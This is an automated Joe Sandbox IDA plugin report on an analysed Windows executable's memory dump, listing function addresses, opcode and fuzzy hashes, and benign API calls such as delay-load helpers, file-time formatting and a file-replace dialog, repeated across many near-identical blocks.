Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0d753fd67795ccaf826d20017cd8bb891c75aa248d0e25c1d45979bd7d27d72f
Instruction ID: eee882afdfb77c439a1658f396fe1bd95724de2377640b69621077d88b691d20
Opcode Fuzzy Hash: 0d753fd67795ccaf826d20017cd8bb891c75aa248d0e25c1d45979bd7d27d72f
Instruction Fuzzy Hash: EEA011E22A800A3C3808B282AC02C3B0B0CE0C2B28338882EF820E0280AC8008002833

Uniqueness

Uniqueness Score: -1.00%

Function 0089E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d853d4e6ba52d860016e91c94cad21a2436f1ab4d04455d8c15455731885f729
Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
Opcode Fuzzy Hash: d853d4e6ba52d860016e91c94cad21a2436f1ab4d04455d8c15455731885f729
Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833

Uniqueness

Uniqueness Score: -1.00%

Function 0089E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 582f5e3fc280877a96041079824e8c2ccb37f944f9ae6994bea8f4a7277e4c55
Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
Opcode Fuzzy Hash: 582f5e3fc280877a96041079824e8c2ccb37f944f9ae6994bea8f4a7277e4c55
Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833

Uniqueness

Uniqueness Score: -1.00%

Function 0089E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d46d32073bc188561c9a73be285a763e7ae00276808c2592281e5d6c5c78d05
Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
Opcode Fuzzy Hash: 5d46d32073bc188561c9a73be285a763e7ae00276808c2592281e5d6c5c78d05
Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833

Uniqueness

Uniqueness Score: -1.00%

Function 0089E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 143222d1ddb1cbd9287008e432e614e84e7569fd215544bfb86d5cf58bc6cb5d
Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
Opcode Fuzzy Hash: 143222d1ddb1cbd9287008e432e614e84e7569fd215544bfb86d5cf58bc6cb5d
Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833

Uniqueness

Uniqueness Score: -1.00%

Function 0089E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d37b34f490c3c86e8db3f10d536d9aae0da9fb7ba38d75140a14f96e17b8054d
Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
Opcode Fuzzy Hash: d37b34f490c3c86e8db3f10d536d9aae0da9fb7ba38d75140a14f96e17b8054d
Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833

Uniqueness

Uniqueness Score: -1.00%

Function 0089E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E580

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4fd68d9e3ddf0626785dfd33f5d204628e0795c8dfebf71324ffd2ab06af2751
Instruction ID: 5c6e8884ea4323e29c375b18d5f52606ff150892b06eb48b83f2d0dcaeb446b0
Opcode Fuzzy Hash: 4fd68d9e3ddf0626785dfd33f5d204628e0795c8dfebf71324ffd2ab06af2751
Instruction Fuzzy Hash: 30A011C22A800ABC3808B2A22C02C3B0A0CE0C2B2833A882EF822C02C2BC8008000832

Uniqueness

Uniqueness Score: -1.00%

Function 0089E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E580

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 29b118bf5e7c7bed4873401cd58fdda8656674dbf5ccd49750665606c9842575
Instruction ID: 5c6e8884ea4323e29c375b18d5f52606ff150892b06eb48b83f2d0dcaeb446b0
Opcode Fuzzy Hash: 29b118bf5e7c7bed4873401cd58fdda8656674dbf5ccd49750665606c9842575
Instruction Fuzzy Hash: 30A011C22A800ABC3808B2A22C02C3B0A0CE0C2B2833A882EF822C02C2BC8008000832

Uniqueness

Uniqueness Score: -1.00%

Function 0089E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E51F

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c23412227f4f15787156aae3bdafa3afed3e79236f356a2e75f0ce98e774050
Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
Opcode Fuzzy Hash: 0c23412227f4f15787156aae3bdafa3afed3e79236f356a2e75f0ce98e774050
Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832

Uniqueness

Uniqueness Score: -1.00%

Function 0089E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E51F

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d9dbad5512f499f9aa93fec4168f04bc4dd4c814de738f1feb698e80ce5f5ee
Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
Opcode Fuzzy Hash: 5d9dbad5512f499f9aa93fec4168f04bc4dd4c814de738f1feb698e80ce5f5ee
Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832

Uniqueness

Uniqueness Score: -1.00%

Function 0089E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E51F

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e478f0000614973403e7a91308b306e6f85894453deda0f1daa66eb62d1cf2d7
Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
Opcode Fuzzy Hash: e478f0000614973403e7a91308b306e6f85894453deda0f1daa66eb62d1cf2d7
Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832

Uniqueness

Uniqueness Score: -1.00%

Function 0089E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E51F

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b77b1d3b916890995177ce5d37c6e80960b768898393adaa51c22e95c59f031f
Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
Opcode Fuzzy Hash: b77b1d3b916890995177ce5d37c6e80960b768898393adaa51c22e95c59f031f
Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832

Uniqueness

Uniqueness Score: -1.00%

Function 0089E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0089E580

Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6388cef8006a180090485097d70c54412326fdf58760735b16a97d0346d78787
Instruction ID: c88cbe3c88ae0304452ea2fc4d4e6ad3a715d1adba6bb0ddd27ff3b4a4ac8014
Opcode Fuzzy Hash: 6388cef8006a180090485097d70c54412326fdf58760735b16a97d0346d78787
Instruction Fuzzy Hash: FDA011C22A80083C3808B2A22C02C3B0A0CE0E2B2A33A822EF820E02C2BC8008000832

Uniqueness

Uniqueness Score: -1.00%

Function 00889F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0088903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00889F0C

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: c8b02d97def9a618b603dc8c7ebece720a0b919260c8d6e7ffcedf10f6fbf09a
Instruction ID: 462386f9651451af1f7076706226530e846d4f7deed9a49e166e411835fd5647
Opcode Fuzzy Hash: c8b02d97def9a618b603dc8c7ebece720a0b919260c8d6e7ffcedf10f6fbf09a
Instruction Fuzzy Hash: FDA0113008080A8B8E002B30CA0800C3B20FB20BC030202A8A00ACA0A2CB22880B8A00

Uniqueness

Uniqueness Score: -1.00%

Function 0089AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0089AE72,C:\Users\user\Desktop,00000000,008C946A,00000006), ref: 0089AC08

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 703e56fd7e5db259d02bf7e40a4962e6f26c419e9759ba01995074db69bf0935
Instruction ID: 2a7e4d5ff0e7b202bf5b4cab9f423ee2f1b085b77511001da250f3ec035ee7c6
Opcode Fuzzy Hash: 703e56fd7e5db259d02bf7e40a4962e6f26c419e9759ba01995074db69bf0935
Instruction Fuzzy Hash: C3A01130200200AB83000B328F0AA0EBBAABFA2B00F00C028B00080030CB30C820AA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0089C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0089C2B1
EndDialog.USER32(?,00000006), ref: 0089C2C4
GetDlgItem.USER32(?,0000006C), ref: 0089C2E0
SetFocus.USER32(00000000), ref: 0089C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0089C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0089C358
FindFirstFileW.KERNEL32(?,?), ref: 0089C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0089C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0089C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0089C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0089C3D4
_swprintf.LIBCMT ref: 0089C404

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0089C417
FindClose.KERNEL32(00000000), ref: 0089C41E
_swprintf.LIBCMT ref: 0089C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0089C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0089C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0089C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0089C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0089C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0089C509
_swprintf.LIBCMT ref: 0089C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0089C548
_swprintf.LIBCMT ref: 0089C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0089C5AF

Part of subcall function 0089AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0089AF35
Part of subcall function 0089AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008BE72C,?,?), ref: 0089AF84

Strings

REPLACEFILEDLG, xrefs: 0089C247
%s %s %s, xrefs: 0089C3F2, 0089C527
%s %s, xrefs: 0089C469, 0089C58E

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin
